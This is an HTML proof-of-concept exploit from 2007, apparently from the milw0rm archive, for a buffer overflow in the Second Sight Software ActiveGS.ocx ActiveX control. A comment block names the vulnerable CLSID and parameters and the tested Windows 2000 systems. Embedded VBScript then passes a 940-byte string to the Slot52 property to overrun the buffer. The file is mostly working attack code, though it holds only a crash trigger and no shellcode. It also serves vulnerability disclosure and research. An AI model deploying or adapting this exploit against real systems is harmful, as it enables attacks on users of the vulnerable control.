58 lines
No EOL
1.6 KiB
HTML
58 lines
No EOL
1.6 KiB
HTML
<!--
|
|
|
|
===============================================================================================
|
|
Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC
|
|
By Umesh Wanve
|
|
==============================================================================================
|
|
|
|
Date : 24-04-2007
|
|
|
|
Tested on Windows 2000 SP4 Server English
|
|
Windows 2000 SP4 Professional English
|
|
|
|
Reference: https://www.securityfocus.com/bid/23554
|
|
|
|
Vendor: http://www.freetoolsassociation.com
|
|
http://www.freetoolsassociation.com/fta/activegs/activegs.cab
|
|
|
|
|
|
Desc: Many parameters of CLSID 052DF14F-6F28-44A0-9130-294FDA6176EB are vulnerable. This activex gives error like,
|
|
Buffer Overrun detected. This is complied with /GS flag. The all vulnerable parameters are
|
|
Slot51,Slot52,Slot61,Slot62,Slot7,Slot71,Slot72.
|
|
|
|
PS. This was written for educational purpose. Use it at your own risk.Author will be not be
|
|
responsible for any damage.
|
|
|
|
Always thanks to Metasploit and Stroke.
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
|
|
<title>
|
|
Second Sight Software ActiveGS.ocx ActiveX Buffer Overflow POC- By Umesh Wanve
|
|
</title>
|
|
|
|
<body>
|
|
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:052DF14F-6F28-44A0-9130-294FDA6176EB" > </OBJECT>
|
|
|
|
<script language="vbscript">
|
|
targetFile = "C:\Research\activegs\ActiveGS.ocx"
|
|
prototype = "Invoke_Unknown Slot52 As String"
|
|
memberName = "Slot52"
|
|
progid = "ActiveGSLib.ActiveGS"
|
|
argCount = 1
|
|
|
|
arg1=String(940, "A")
|
|
|
|
target.Slot52 = arg1
|
|
|
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
# milw0rm.com [2007-04-24] |